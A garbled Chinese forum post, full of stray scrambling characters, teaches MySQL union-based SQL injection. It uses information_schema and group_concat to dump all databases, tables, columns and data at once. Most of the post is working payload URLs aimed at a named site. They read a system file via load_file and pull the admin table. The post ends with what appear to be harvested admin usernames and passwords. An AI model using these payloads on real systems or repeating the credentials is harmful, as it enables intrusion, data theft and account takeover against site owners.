此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
' L- a3 p% P5 a, w% v8 o! W但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人0 z8 _1 U; @& l$ N" u
8 p6 T' L6 q1 }. M7 o, g0 Y7 k* ?, V p
/ V* b& _* f$ q优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入( D5 ]# ?' p2 Z0 u/ D7 O0 p' ~
" |- n& P- ?3 Y
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢..." r g+ l! |# y! {
) `& \: m: E) ?9 z3 p' q下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示+ d0 x: T# j: w
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
y8 W1 B" \% R* R, a
5 }/ N3 f7 n5 b9 ?http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17, n% K- x7 `6 N: A2 {0 o
! {- r. J$ \8 h/ z6 L3 b读出所有库:! ]+ Z) U# s9 [" @- x) C9 S; j
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA% D0 r5 u: m3 w& a
, P) n8 F$ r3 t. e) Y" _( f) y
# y0 {: j$ L8 w L/ S/ d& |& ?. N. x9 T7 g
( @3 y) j5 G7 A; c$ {: J- i; K" Z) I读出所有表:
" m, n- z& f0 b/ P$ S" ~" Shttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
: J. ?6 \" s' m, Y; h
# G C) L. I. k! f8 r( L* R读出所有表字段:
$ d/ d5 D) A* ghttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110) u6 d; S2 `- W# G, o5 Y
*/ (97,100,109,105,110)为admin的ascii码 依次类推
, a t) ]; Y+ c# w; P& D5 ?5 W$ P& M6 B# E
读出所有表字段里的内容:
: E# ]: A! Z/ a/ A. j6 lhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
7 T) d0 l5 j4 w# d0 P# V% I
* r) e) ]" `2 b; ~$ O- a$ [/ T) X' C6 K* g
$ o) L; j( }3 D: n5 y+ h0 U
, h1 N6 Z' ?/ `; Y2 z1 R, H I6 i0 B8 B9 @9 @
( J- L8 m- ]& q* V0 j4 v6 L
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%239 T' B6 ?" d3 a$ |5 f, W/ d& D! H' r
9 V$ [0 ^& U1 x- ~2 P1 s
0 m% b2 @) J Q# Rhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23' W0 M- C, A4 p+ K. Z
1 e0 G. l0 _8 p+ _. c; W/ [. dhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23$ i* @2 ]- K& o
% \; a, `" r9 I4 P' \6 A. T) r
3 \- F/ ?) ]+ z# G; y. K
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23- P, b3 a9 Q6 u0 P. B
: p3 [" F! A! a
4 w& L+ v/ P1 S2 ?2 s: W- ^! G webmaster:dzb521123,simlab:simadmin200432333 Z t- Y0 q1 S; ?. b& Y
|